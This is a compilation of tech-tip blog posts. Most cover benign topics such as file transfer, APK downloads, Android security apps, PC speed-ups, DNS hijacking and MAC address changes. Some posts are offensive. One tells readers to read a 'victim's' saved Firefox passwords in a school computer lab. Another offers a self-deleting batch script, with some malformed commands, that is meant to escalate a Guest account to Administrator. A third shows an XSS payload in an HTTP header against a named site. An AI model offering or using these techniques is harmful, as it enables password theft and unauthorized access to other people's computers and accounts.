Easily Transfer Files Between your Computers over Wi-Fi

Any Send (video demo) is a must-have software utility that will help you copy files between any two computers (PC-PC, PC-Mac, Mac-Mac) over your Wi-Fi network. You can move files of any type, there are virtually no limits on the file size and the transfers happen at a fast speed.
Transfer Files Between Computers
Easily transfer files between any two computers – Mac & PCs

Transfer files between Mac & Windows

With Any Send, you can transfer files between Windows computers or between your Mac and Windows PCs. They also have an Android app that will let you quickly send files from any Windows or Mac computer to your Android mobile phone or vice-versa.
To get started, you need to install the Any Send app on your computers. Then select one or more files that you wish to transfer to the other machine. Press Ctrl + C to copy these files to the clipboard, click the Any Send icon in the Windows task bar (or the Menu bar of your Mac), and select the other computer’s name. The file transfer will happen instantly.
In addition to files, you can also transfer entire folders from one computer to another without having to zip them first. Just select the folders, copy your selection to the clipboard and choose the destination computer from the Any Send icon.
Unlike most other alternatives for sharing files, Any Send is easy to setup and requires no configuration. The only condition is that all your computers (and Android phones) should be connected to the same Wi-Fi network.
You can download Any Send for your computer and phone at GetAnySend.com

Easy Way to Download APK Files from Google Play

Android apps are packaged as APK files. You can use any File Manager app to copy these files from the computer to your Android device and then touch the .apk file to install, or sideload, the corresponding app on your device.
There are various reasons why you may want to download the APK installer of an Android app from the Google Play store:
  1. Google Play Store says that a particular app or game is incompatible with your Android device though you know that the app would work just fine.
  2. Sometime an Android app may be not be available for download in the Google Play store of your region or country.
  3. An app is listed on the Google Play store but you want to install that app on another Android device, like the Amazon Kindle tablet, that doesn’t have the Play Store.



How to Download APK Files from Google Play Store

Evozi, an Android app developer, offers a one-click online APK download app that lets you download the APK installed of any Android app that’s listed on the Google Play store. The downloader app can be accessed at apps.evozi.com.
To get started, enter the web URL of any app listed on the Google Play store and click the “Generated Download Link” button. The APK download app will fetch the APK file from the Google Play store and will host it on its own servers from where you downlaod the file.
Since the APK files are directly fetched from the Google Play Store, it’s unlikely that the Android App will be infected with any malware. Also, to prevent app piracy, the APK downloader only lets you download free apps and games from the Google Play store, not the paid ones.

Is Your Outgoing Email Messages Leak Your IP Address ?

When you send an email to someone, the outgoing message may sometimes include the IP address of your computer that was used to send that message. The IP address is included inside the message header and, if available, it can help the recipient trace the approximate geographic location of the sender.
Not all email providers include the sender’s IP address in the outgoing email messages.
For instance, Gmail omits the sender’s IP address if you send mails through Gmail’s website or through Gmail’s mobile apps but the IP address gets included if you use a third-party program – like Microsoft Outlook or the Mail App on your iPhone – to send the message through your Gmail account. Outlook.com also hides the sender’s IP address while Yahoo Mail includes that information in the outgoing message headers.
If you would like to know if your email client is revealing your IP address to the recipients or not, you can either send an email to yourself and look at the message headers but if that sounds a bit too technical, give emailipleak.com a try.
When you open the site in your browser, it detect your computer’s IP address and creates a unique email address for you. You are required to send a blank message from your email client to that address. When the message arrives, the tool looks for your IP address in the headers of the incoming message and alerts you if a match is found.
The site’s privacy policy says that it does not collect any user information and the information is discarded immediately after any results pages are constructed.
Email IP address

Protect your Android Phone with these Security Apps

There are a plethora of security apps in the Google Play store that help you safeguard your Android phone and offer options that increase your chances of locating your lost (or stolen) device. The Lookout app was the most popular choice for determining the location of a lost phone but with Google’s own Android Device Manager available, Lookout can be skipped (unless your phone is running an older version of Android).
The Android Device Manager shows a list of all Android phones and tablets that are connected to your Google Account and helps you locate them on a Google Map. You can ring your phone (in case it is hiding beneath the pillow) from the browser, lock the device with a custom PIN or perform a factory reset which permanently deletes all the data on your phone.
Android Device Manager requires that the device is online – connected to mobile data or Wi-Fi – for you to remotely ring, lock or erase the phone. There’re however apps like Prey andWhere’s my Droid app that let you remotely send commands to your phone via text messages.
Android Security Apps
For instance, an SMS command like “GO PREY” to your lost phone from any other mobile phone will ring the phone, record its geo-location and also captures a picture with the front camera. You can also lock your phone, erase the data, show a system notification or take a picture on-demand through commands sent via text messages.
Both Prey and Where’s My Droid can be configured to send SMS alerts to another number should someone try to change the existing SIM card of your phone. That said, you should also activate the SIM lock on your Android phone (Settings -> Security -> Setup SIM Card lock) and the device will require a password whenever it is powered on.
When you are charging your cell phone at a public station, you either have to watch the device all the time or you can activate the Anti-Theft Alarm app and relax a bit. The app will trigger a siren sound when someone disconnects the charger and your phone screen will flash continuously until the correct pin is entered. You can go a step further and configure the app to trigger an alert when someone moves the phone even a few inches from the original position.
Another Android App LockWatch records the phone’s location and captures a picture with a front camera when someone attempts to unlock the phone but enters a wrong PIN or password. This information is send to your email address and it happen silently so the intruder would never know that their activity has been recorded.
If the device gets lost or stolen, it is important that you report the matter to your carrier and the police and they are likely to ask for details like the device’s IMEI number, IMSI, SIM number, etc. It helps if you can keep a record of this information somewhere outside your phone. You can find the IMEI number by dialing *#06# or get the SIM reader app and it will instantly extract the SIM and Device info that you can save to your email account.
One more thing. You have protected your Android phone with a numeric PIN or a more complex alphanumeric password but these are obviously inconvenient as you have type the string every time you turn on the screen. A free app called SkipLock makes you life a bit easier.
The app will basically remove the lock when you are connected to one of the recognized Wi-Fi networks and restores the lock as soon as you are on 3G or a non-recognized Wi-Fi network. Thus, the phone stays unlocked when you are home but as soon as you step out, the lock becomes active. Since the SkipLock app isn’t in the Google Play Store, you’ll have to enableUnknown Sources to install the APK file on your phone.

How To Hack Saved Password In Firefox ?

How to do ?

1. Open Firefox Web Broweser
2. Then Click on FireFox > Option > Option as shown in below picture


3. Then a POP Up box will appear, In that go to security and click on Show Passwords as show below.


4. Now click on website whose password you want to see ans click on show password as shown in below image. (Note: It will ask for confirmation so click on yes when dialog box appears)
 

5. Done, You have hacked password of your victim with few simple steps. You can try this at school computer lab if someone have saved their password. 
 

Hack Administrator from Guest

Hack Administrator Account from Guest Account.Yes!! that is quite possible.All you need to do is to follow the below procedure.



echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0




Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...

-----------------------------------------

ADMINISTRATOR IN WELCOME SCREEN.


When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:
1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.



EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!


Start the Registry Editor Go to:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.

How to make you computer fresh and fast



Remove Useless software and apps : We often install many unnecessary application and later forget to uninstall them These application becomes burden in our computer and eventually slow down our computers So at first you need to delete all this unnecessary application and software To uninstall the software you should go to Control Panel->Add or remove->find and select the software you would like to uninstall.
Utilize your RAM performance : A lot of you may have these setting already set. But If you don’t have then don’t worry. You just have to follow the process. Right click on My computer->Properties->Advanced system settings->Setting(Under Performance)->Advanced->Change(Under Virtual Memory). Now double the number in Maximum size then the number initial size. It will surely help your PC to utilize the most of RAM.
Check for errors : Our computers face errors very oftenly in daily use and some errors stuck to our computer hard disk which makes our computer slow. So its very important to kill those errors to make our computer work better. Go to My computer and press enter .Our main hard disk is usually C: and we need this drive to be free from error So right click on Hard disk C and then click tools Then from the Error-Checking option click You may need to restart the computer to do so It will make your computer Faster.
Desktop-cleaning : We often keep unnecessary file in our desktop but it actually affects the performance of our computer. Delete the useless files or another choice is to move them to Local disk if necessary. You should only keep shortcuts in your Desktop only if you needed. If we keep Wallpapers on our desktop it also effect slightly to slow down our computer a blank screen is always better remove temporary internet files and cache from your web browser Browsing internet slow down our computer You need to clean these temporary files and cookies to make your computer stay clean and faster. There are a no. of software available today in the market which can do the task for you. You can use Ccleaner for this purpose which is a very trusted software. To proceed to the official website to download Click here
Disk Defragmentation : We should defragment our disk to make our PC faster. For deframentation process, just follow the same steps given below. Locate Hard disk C then click properties then click tools and then click defragment Now from the option Disk defragmentation.
Use a Trusted antivirus : he last but not the least tip is to use a reliable trusted antivirus which will protect your PC from harmful antivirus. Kaspersky and AVG are some of the trusted antivirus but you have to pay to use them. If you don’t wish to pay some money then you can also download free Microsoft security essential to save your computer from harmful Malware and spywares. Check the link here

DNS Hijacking: What it is and How it Works


DNS hijacking (sometimes referred to as DNS redirection) is a type of malicious attack that overrides a computer’s TCP/IP settings to point it at a rogue DNS server, thereby invalidating the default DNS settings. In other words, when an attacker takes control of a computer to alter its DNS settings so that it now points to a rogue DNS server, the process is referred to as DNS hijacking.
As we all know, the “Domain Name System (DNS)” is mainly responsible for translating a user friendly domain name such as “google.com” to its corresponding IP address “74.125.235.46″. Having a clear idea of DNS and its working can help you better understand what DNS hijacking is all about. If you are fairly new to the concept of DNS, I would recommend reading my previous post on How Domain Name System Works.

How DNS Hijacking Works?

As mentioned before, DNS is the one that is responsible for mapping the user friendly domain names to their corresponding IP addresses. This DNS server is owned and maintained by your Internet service provider (ISP) and many other private business organizations. By default, your computer is configured to use the DNS server from the ISP. In some cases, your computer may even be using the DNS services of other reputed organizations such as Google. In this case, you are said to be safe and everything seems to work normally.

But, imagine a situation where a hacker or a malware program gains unauthorized access to your computer and changes the DNS settings, so that your computer now uses one of the rogue DNS servers that is owned and maintained by the hacker. When this happens, the rogue DNS server may translate domain names of desirable websites (such as banks, search engines, social networking sites etc.) to IP addresses of malicious websites. As a result, when you type the URL of a website in the address bar, you may be taken to a fake website instead of the one you are intending for. Sometimes, this can put you in deep trouble!

What are the Dangers of DNS Hijacking?

The dangers of DNS hijacking can vary and depend on the intention behind the attack. Many ISPs such as “OpenDNS” and “Comcast” use DNS hijacking for introducing advertisements or collecting statistics. Even though this can cause no serious damage to the users, it is considered as a violation of RFC standards for DNS responses.
Other dangers of DNS hijacking include the following attacks:
Pharming: This is a kind of attack where a website’s traffic is redirected to another website that is a fake one. For example, when a user tries to visit a social networking website such as Facebook.com he may be redirected to another website that is filled with pop-ups and advertisements. This is often done by hackers in order to generate advertising revenue.
Phishing: This is a kind of attack where users are redirected to a malicious website whose design (look and feel) matches exactly with that of the original one. For example, when a user tries to log in to his bank account, he may be redirected to a malicious website that steals his login details.

How to Prevent DNS Hijacking?

In most cases, attackers make use of malware programs such as a trojan horse to carry out DNS hijacking. These DNS hacking trojans are often distributed as video and audio codecs, video downloaders, YoTube downloaders or as other free utilities. So, in order to stay protected, it is recommended to stay away from untrusted websites that offer free downloads. The DNSChanger trojan is an example of one such malware that hijacked the DNS settings of over 4 million computers to drive a profit of about 14 million USD through fraudulent advertising revenue.
Also, it is necessary to change the default password of your router so that it would not be possible for the attacker to modify your router settings using the default password that came with the factory setting. For more details on this topic you can read my other post on How to hack an Ethernet ADSL Router.
Installing a good antivirus program and keeping it up-to-date can offer a great deal of protection to your computer against any such attacks.

What if you are already a victim of DNS hijacking?

If you suspect that your computer is infected with a malware program such as DNSChanger, you need not panic. It is fairly simple and easy to recover from the damage caused by such programs. All you have to do is, just verify your current DNS settings to make sure that you are not using any of those DNS IPs that are blacklisted. Otherwise re-configure your DNS settings as per the guidelines of your ISP.

What is HTTP Header Injection Vulnerability


HTTP Header

HTTP Header is the component of HTTP requests and responces. Header fields are transimitted with each request and responce and carry additional data about the requests and responces.

See the typical request and responce headers Here at Web-Sniffer.net

HTTP header injection

HTTP header injection is a kind of web application vulnerability which exists on those web applications that generatd HTTP headers based on the input given by users. If it uses User based input in the headers, it can be used for HTTP response splitting, cross-site scripting (XSS), Session fixation via the Set-Cookie header, and malicious redirects attacks via the location header.


I recently found a similar kind of vulnerability in http://canadaedu.apple.com and for this I was also acknowledged by Apple on its website.

It used apache 1.3.33 that was vulnerable to the HTML and malicious javascript injection through  "Expect" header.

See the responce header of the website:
GET / HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: canadaedu.apple.com
Cookie: PHPSESSID=3b8026225d719c6945155129c5c7335d
Connection: Close
Expect: <script>alert(411731119275)</script>
Pragma: no-cache
The alert box added in the Expect field could be injected for Cross Site Scripting.

Change MAC Address in Windows 7


MAC address (Media Access Control) is the unique number (identifier) which is assigned by network interface hardware manufactures and store them into their hardware. MAC address used in hardware interface devices

The MAC address is a 12-digit hexadecimal number which is ranging between 0000 0000 0001 Ć¢€“ FEFF FFFF FFFF. This 48-bit address space contains potentiallyƂ 248Ƃ or 236,364,981,534,362 possible MAC addresses. Know about to changing MAC address in your PC is much needed one to hide your online identity, avoid potential of data losses and fight against hackers. we have two Methods for changing MAC address Windows 7.

Instructions
Method 1: Change settings from Device Manager
Step 1: Click the Start button, type Device Manager in the Start Search box and then press ENTER to open Device Manager.
Step 2: Right click on Network Adapter , click Properties .
Step 3: Under the Advanced tabHighlight Network Address , input the desired values in the text box and then click OK.
Method 2: Change the registry value

Step 1:Ƃ Click the Start button, type regedit in the Start Search box and then pressENTER to open the Registry Editor.
Step 2:Ƃ Navigate to-
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlClass{4D36E972-E325-11CE-BFC1-08002BE10318]
Step 3:Ƃ Under this key, you should see numbers in sequence as “0000 “, “0001 ” and so on. Click one at a time to check the description of the device to match it with that of yourNetwork Card. In this case it is “0008 “.
Step 4:Ƃ Highlight the corresponding number that match your Network Card, in the right-pane, look for the “NetworkAddress ” key value. Right-click on it and select modify . Enter the desired MAC-Address as a 12 digit number (all in one, no “space” “.” or “-“)
Step 5:Ƃ If the key “NetworkAddress” does not appear in the right pane, right-click in the blank space, select “New ” then “String Value“. Enter the name as “NetworkAddress“. Now Double click on it and set the desired value.

How to Remove USB drive by Shortcut


Do you want to remove your USB drive by Shortcut? I’m gonna give you a shortcut trick to remove USB drive easily.

Just follow these steps.
  • Right Click on Desktop and create a new shortcut

  • Then copy-paste this path in the location of the item
%windir%system32RunDll32.exe shell32.dll,Control_RunDLL hotplug.dll

  • Click Next and complete.
  • Now you have a shortcut like rundll32. You can rename it to anything if you want
  • Done!!
  • Now next time whenever you want to eject or remove any usb drive safe way , you can double click on this shortcut and easily unplug that usb drive.

Mozilla Firefox Released Its Stable version 8


  • Mozilla has released the latest desktop version of Firefox for Windows, Mac, Linux, and Android.
  • The new version of Firefox adds Twitter as a search option. Twitter is now included as a search option in Firefox for Windows, Mac and Linux.
  • Firefox 8 has also added a feature to enhance security and privacy. Firefox is now disabling add-ons installed by third parties without permission and asking the user to pick the ones which should be enabled.
  • Firefox 8 also adds support for a WebGL security feature. It adds support forCross-Origin Resource Sharing (CORS), which lets developers load WebGL textures from other domains in a secure way.
  • Mozilla claims Firefox 8 to be faster than previous versions with improved support for HTML5 and WebGL.
  • Mozilla has also released an update to Firefox for Android. The new features in upgrade include Firefox Master Password, which allows users to protect saved usernames and passwords.

Use Any Sim In Any Modem Without Unlocking


1. Insert SIM in Modem.
2. Modem show invalid SIM, just ignore it and close modem software.
3. Start NOKIA PC suite.
4. Go to Nokia PC suite connect to internet option.
5. Go to Configure. Select your data card modem,and make all operator apn setting as like when we use Nokia mobile connection.
6. Finish set up.
7. Now connect to internet through PC suite.
8. Wow your net is connected without unlocking the modem. Or U can use it by Other Method also just put Sim card in the modem andƂ  connect it to PC. Modem software if it Says invalid Sim ,just go to connections and connect Ur Sim will be recognized there..

How to Avoid Facebook Viruses and Spam Messages


Facebook, the biggest social network with 500 million users, provides an interface to hit an unsuspecting crowd with malware and viruses. These viruses aren’t very difficult to detect  if you are cautious enough. These Facebook viruses appear on your wall in forms of a bizarre or eye-catching stories and videos and once the user has clicked/liked the link, it is already late. The next step will be getting rid of your Facebook virus which is a time-consuming  process.  Its better to avoid spam messages and trojan viruses in the first place.
 

How to avoid it?

1. Think before you Act. Viruses on Facebook are sneaky. The hackers and cybercriminals who want your information know that Facebook users will often click on an interesting post without a moment’s thought. If a post sounds a bit over-the-top like a headline out of a tabloid, this is your first warning sign.
2. Try to avoid Links and videos with Catchy words like  “funniest ever,” “most hilarious video on Facebook,” or “you’ve got to see this.” Do some keyword research to see if the post in question comes up in a search engine with information about a current virus or trojan.
3. Check the poster of the Suspicious content. If you receive a message from someone you do not know, this is an obvious red flag. Facebook video viruses also tend to pop up in your news feed or on your wall from friends you haven’t talked to in a while. Unfortunately, it’s likely this friend has already fallen victim to the latest virus on Facebook. After clicking on the story themselves, the message was sent out to all of their friends as well.
4 Avoid messages that have been posted by multiple users as the virus spreads among your friends who were not so cautious. If a link with title such as “Sexiest video ever” shows up all over your feed from all kinds of people (perhaps friends you would not expect to make such a post), this is another warning sign. Similar direct messages are a likely variant of the notorious Facebook Koobface virus which has used this approach in the past.
5. Do not fall for the “typical” money-transfer schemes. Chat messages from friends needing funds will usually sound suspicious. Everything can’t be screened before posting, so money transfer scams and hoax applications still find their way on to Facebook. You should also avoid applications that claim to do a full “Error check” or fix security problems related to your profile.
6. Update your anti-virus software frequently. If you do accidentally click on a post before realizing it is a hoax, do not click on any further links or downloads. If it’s too late and you have already been infected, the Facebook virus removal process may be effortless if you have a good anti-virus program to catch the virus, trojan or other malware early on.

What’s Next?

These were few important tips to safeguard your facebook account but your job isn’t done yet. Once you have detected that the link/post on your facebook wall is Malicious you should Mark it as SPAM so that the facebook support will stop it from spreading further and infecting other users.
If you have ever fallen victim of any such Malicious Scheme, please share your experience with all the users  in form of comments so that others don’t fall victim of it.

How To Uninstall Any Software Or Progam Within A Single Click


Hello to all . i hope you all are fine today i am come with a new trick which is quite amazing trick that help us to uninstall any program or software within a single click from your own pc . we know that always we uninstall all the programs and applications  by going to control panel.
but guys this is not a trick just it's very amazing software that helps us to save our time . this software helps us to install any program from it's shortcut. this software known as menu uninstaller. this  software works in all windows os like xp , vista and windows 7.


so if any one want how this software works then follow given below steps

1. First You download menu uninstaller and then install it in ur pc



2. after installing this software . now you click on any software or application shortcut that you just want to uninstall. when  you right click on it then just take a look at the screenshot

Latest Facebook Account Shortcut Keys For Mozilla And Internet Explorer


Hello guys today night i am sharing with you some latest facebook shortcut Keys For Mozilla And internet ExplorerBrowser . When you use yourfacebook account then use these facebook shortcut keys of facebook.

How To Boost FireFox Browsing Speed Using SpeedyFox



Hello to all friends . i hope you all are fine . Today i am going to tell you how can you boost Mozilla firefox browsing speed using speedyfox or how to optimizeFirefox . So Just Follow Some Below Given Steps For Do This.


How To Increase Speed 


1. First You Need To Download Speedyfox So Click Here For Download Speedyfox.


2. Now Run It


3. Now Firefox Should Be Closed.




4. Now it will run it's process will complete within few seconds and give you sucess Message Like Above  Images in 3rd step.










5. That's It Now Just Enjoy Faster Firefox Speed :)

Internet Cyclone - Increase Internet Speed in Windows


Internet Cyclone  Is a powerful Internet tool for Windows 7,  9x, NT, 2000, 2003 and XP created to modify your Windows registry settings in order to speed up internetconnection Speed up to 200%. 
After you upgrade your internet connection you can still use the software because It is fully compatible with all hardware.

Internet Cyclone Main Features: 

  • Speed up internet to 200% in just a few seconds.
  • It's compatible with all modems and high-speed LAN, ISDN, CABLE, DSL, T1 or other internet connections .
  • It will speed up video streaming like Youtube, Metacafe, Google, etc.
  • It will speed up web surfing, online gaming, e-mailing, etc
 Click Here For Download Internet Cyclone